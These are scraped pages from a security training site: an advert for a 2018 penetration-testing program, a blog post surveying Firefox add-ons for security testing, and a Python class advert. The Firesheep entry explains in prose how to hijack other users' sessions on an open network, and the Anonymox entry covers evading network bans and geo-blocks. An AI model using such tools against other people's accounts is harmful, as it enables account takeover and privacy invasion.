This program is hard, though rewarding. It will cover the following subject areas:

  • Command-Line Kung Fu
    • Linux Command-Line Fundamentals
    • Windows Command-Line Fundamentals
  • Network Penetration Testing
    • Scoping a penetration test
    • Performing a Penetration Test
    • Reporting penetration test findings
  • Web Application Penetration Testing
    • Scoping a web application penetration test
    • Performing a web application penetration test
    • Reporting web application penetration test findings
  • Python For InfoSec Professionals
    • Log parsing with Python
    • Pcap parsing with Python
    • Network testing with Python
    • Web App testing with Python


  • Preparing for a job as a Penetration Tester
    • Resume assistance
    • Assistance with building a portfolio based on this program
    • Mock interview
    • Interviews with up to 10 Penetration Testing firms for top candidates
    • Interviews with up to 5 DoD contractors for top cleared candidates

Pentester tools.

What is the actual class schedule?

February classes
    + 26th and 28th of February 2018 from 7pm to 9pm ($200 if purchased separately)


March classes
    + 9th and 11th of March 2018 from 7pm to 9pm ($200 if purchased separately)
    + 12th and 14th of March 2018 from 7pm to 9pm ($200 if purchased separately)
    + 19th and 21st of March 2018 from 7pm to 9pm ($200 if purchased separately)
    + 26th and 28th of March 2018 from 7pm to 9pm ($200 if purchased separately) 


April classes
    + 9 and 11th of April 2018 from 7pm to 9pm ($200 if purchased separately)
    + 23rd and 25th of April 2018 from 7pm to 9pm ($200 if purchased separately)


May classes
    + 7th and 9th of May 2018 from 7pm to 9pm ($200 if purchased separately)
    + 21st and 23rd of May 2018 from 7pm to 9pm ($200 if purchased separately)
+ 28th and 30th of May 2018 from 7pm to 9pm ($200 if purchased separately)



How is the pentester program delivered?

Candidates will receive a set of tasks each Monday. They are to complete the tasks by Sunday at midnight EST. The tasks include:

  • Reading
  • Watching videos
  • Lab exercises to perform

On Thursdays from 7-8pm EST, a career development class (focused resume development, portfolio development, mock interviews, and discussions with potential employers).

On Saturdays from 4-6pm EST, a live online training session/QA period will be held.


What are the prerequisites for the pentester program?

This program is more about desire. More so, it is about work ethic and ability to work in a team environment. Although Technical ability is important, it is not the most required attribute. That being said, candidates should have:

  • Familiarity with both Windows, Linux, and VMWare
  • Familiarity with basic programming concepts
  • Ability to commit 8-12 hours per week to the program

What do you receive?

  • Access to the training program
  • Weekly group mentoring sessions with Joe McCray
  • Monthly chances to speak with hiring managers and team leads. These are managers from security consulting firms. This will happen for each month of the program
  • Log book of all of your labs. This is a technical walk-through document demonstrating your proficiency to companies you interview with
  • A letter of reference from Joe McCray
  • Top candidates are guaranteed interviews with consulting firms and DoD contracting companies.

Candidates will have a chance to take ANY and AS MANY classes that they want from InfoSec Addicts. This will come as part of this program. Most notably, as many as 20 classes are held per month.

This program will run for 3 months. It will run from the month of March up to the month of May 2018. Interviews for top candidates will occur later in the month of June 2018.

Please fill out the form below to sign up for this program.

$300.00Select options






Plug-ins, additional features in a browser, enhance the user experience. Firefox is one browser that supports a variety of plug-ins. These could include video scripts, animations, and other elements. Browsers alone do not typically support these.

Understanding how plug-ins work and interact with browsers is important. This is because most malicious attacks use plug-ins as a cyber-trespassing and theft tool. Moreover, we will secure our systems properly by understanding how plugins work.

Plug-ins have a multitude of purpose. These are used to ensure safe browsing, information grabbing, entertainment purposes, among other uses. Below are useful plug-ins one can use to gather information and carry out penetration testing.

FoxyProxy Standard

This add-on is a proxy management. It improves the browser’s proxy capabilities as well as providing analysis of URL patterns. It also switches the network connection transversely among different proxy servers. One sees an animated icon on the browser when a proxy is in use.

FoxyProxy Standard has a history tab that logs the servers used. It is possible to set the plug-in for use when necessary based on the URL’s nature. This, as a result, makes the add-on more efficient than other proxy management plug-ins.

Firefox plug-ins


This is a Firefox web development tool embedded into the browser function. It enables the editing of HTML, JavaScript or CSS directly from the live page. The changes thereafter directly seen after saving.

This plugin helps in pinpointing web application and web page vulnerabilities. It opens a window to launch a penetration attack and can collect a user’s data. It also enables inspection of HTML elements in the page.

The CSS tab functions to check and edit the style of the page. It is a convenient way to edit the look of the page and consequently view the changes immediately. Copying of Codes is further possible for further development outside the browser. It also enables scaling and margin setup to align text and images. Additionally, it can monitor network activity. If a page is loading slowly, you can check what causes the lag from this plug-in. Firebug also has a powerful JavaScript debugger that identifies errors and measures performance of a script.

Furthermore, Firebug monitors network activity. If a page is loading slowly, you can check what causes the lag from this plug-in. Firebug has a powerful JavaScript debugger that identifies errors and measures performance of a script.

The DOM tab found in the Firebug panel helps identify code tags and edit them. This plugin also allows the easy management of cookies. All accepted cookies are reviewed as they are listed according to value.

Firefox plug-ins

Firefox plug-ins

Live HTTP Headers

Live HTTP headers are effective penetration tools used for troubleshooting, tuning and analyzing a website. This plug-in contains data such as language, caching, authorization, and character set. Normally, these data are invisible. This plugin, however, enables access to this information.

To obtain header information, right-click on the page and select “View Page Info.” Next, click the header tab on the new pop up window to view page information. Press ‘”Ctrl+Shift+A” to replay the header.

Firefox plug-ins

This plug-in is considered as a sniffer application. That is because it can view HTTP header exchanging. You can see what is happening and analyze it, and stop packet capture. To change header or URL values, you only need to highlight, edit and replay a packet. Finally, this works on both Windows and Linux.


Hackbar is another penetration testing tool. It appears as an extension of the address bar. Hackbar is capable of performing POST data manipulation, encryption, and encoding. This helps test XSS holes, web security, and SQL injections. Moreover, one can work on Hash algorithms, Base64 Decoding, and other data types with Hackbar.


Firesheep gives you the capability to attack HTTP sessions of other users accessing the same network. This plugin shows all accounts found in the network. This uses the cookie unique to a logged in account. This a result of websites protecting initial log-ins but leaving the rest of the log-ins unprotected.

These cookies are readily available for use by attackers in any open network. Firesheep captures users visiting an unsecured page. Double clicking a seized item, logs you in as that user.

Tamper Data

Tamper Data is used to edit and view HTTP requests. This add-on records ongoing requests for display on a particular website. The window shows details such as time, total duration, size and other information. Most noteworthy is that the data is copied to an external file for future reference.

Firefox plug-ins


CryptoFox is an encryption-decryption plug-in. It appears as an extension of the address bar. Moreover, it has two fields. The first one corresponds to the text that needs encryption. The next field is a selection of the desired encryption method.

CryptoFox performs over 40 techniques. Furthermore, it has a dictionary attack reference for MD5 passwords. To test this plug-in, here is an AES128-bit encryption. Let’s use the AES 128-bit decrypt method for this.

Firefox plug-ins

Type “helloworld!” in the text field. Next, select AES 128-bit encryption and later on press the decode button. Thereafter, enter the “passwd” when asked to enter a password. This password will also be utilized for the decryption later. Especially relevant is the that we will use this password for decryption later.

Firefox plug-ins

After entering your password, Click OK. Afterward, this encrypts the text which is later displayed in the first field. For cross checking purposes, select the AES128-bit Decrypt and use the same password.

Firefox plug-ins


Anonymox is a useful plug-in that enables anonymous browsing in Firefox. This plugin creates a virtual identity. That is so because it protects you, giving access to commonly banned sites on your network. It also helps one in changing their IP address.

In addition, one can tweak Anonymox’s customizable settings per every website. Bypassing GeoIP blocks is also possible through this add-on. This is possible as it changes your origin location. This, as a result, gives you access to banned sites in your country.

The Anonymox acts as a middle ground. The request is sent to the plug-in and later, the plug-in itself replies to the web host. It enables you to select proxy identities.

Firefox plug-ins

SQL Inject Me<

This penetration testing plug-in identifies vulnerabilities in SQL injection. It looks for database errors and loopholes. This, in turn, helps to carry out an attack through sending escape strings in the database. A completed test result shows errors and the options.

Firefox plug-ins

Certificate Patrol

Certificate Patrol helps pinpoint man-in-the-middle attacks. This is done by checking SSL certificates. It shows whether anything within the certificate is modified during an exchange. This add-on uses pop-ups to inform you SSL details and lets you choose to save or not. If saved, the plug-in can cross-check for disparities.

To verify a certificate, the plug-in shows old and new versions of the SSL. You must be cautious in finding and comparing for errors. Click the Reject button should you find anything suspicious.

Firefox plug-ins


Web crawlers are useful. FoxySpider in Firefox is one such add-on that organizes a website. It displays and arranges videos, music, images, etc. according to file types. It is useful in gathering information about a website.

An icon on the left side of the address bar indicates that FoxySpider is installed. There are three settings for this tool. Left clicking organizes the files, while right-clicking opens a search configuration window. Middle clicking on the icon, on the other hand, pops up a window to set requirements such as keywords or specified URLs.

Firefox plug-insFirefox plug-ins

Firefox plug-ins

Firefox plug-ins

Firefox has a 35% user rating. With plugins such as these, security engineers can find it convenience in performing their tasks. Testing and gathering information is made easier with these add-ons. We encourage you to download these plug-ins to try it out yourself.


Elsewhere, Click here to have a look at another cool post about Dridex malware.

Python For InfoSec Professionals

Python For InfoSec Professionals Night Class

This class aims at making students comfortable with using Python to perform simple IT Security tasks. Going beyond using other peoples’ tools in this field is the hardest step on the ladder to proficiency. This class will take you over that difficult step, enabling you to modify popular security tools or write your own. Most importantly, it is all taught in a simple manner that won’t put you to sleep like most programming courses.


Class Outline

Programming Concepts, Parsing Files, Logs, and PCAPs

  • Python Basics
  • Text File Parsing
  • CSV File Parsing
  • Log Parsing



  • PCAP Parsing
  • Port-Scanning
  • Bind/Reverse Shells
  • Scapy


  • SQL Injection
  • XSS


  • Memory Analysis
  • Identifying/Classifying/Analyzing Malware
  • Exploit Development with Python
  • Debugger automation

Please register to attend the class:



Students will receive

  • 30 hours of CPEs
  • Courseware slides
  • Lab Manual

Class Videos

Each class will be recorded and made available to the students via email. So you can keep up with the class even if you have to miss time or even a whole day.


Each student will receive access to an InfoSec Addicts Group ( for the class. Groups are where students can ask questions outside of the regular class hours, work with other students on lab exercises, homework, and challenges.

A class mentor is assigned to the InfoSec Addicts Group to answer questions (allow one day for responses).

Similarly, a Customer Relationship Manager is assigned to the class to manage questions and support issues.

Class Schedule

28th and 30th of May 2018 from 7pm to 9pm EST


Class Cost: $200

Fill out this form to sign up for the class.

$200.00Select options



Unlimited classes:

If you know that you are interested in this class as well as other InfoSec classes then you should consider the unlimited classes package for $49.99 per month. You can find out more about it by clicking on the link below:


NOTE: Due to Joe McCray’s travel and work schedule (ex: short notice consulting/training engagements or changes to those engagements) classes may reschedule or cancel. In these situations a refund will NOT be granted as the class will re-run the following week, or additional days will be added to the class schedule to make up for this.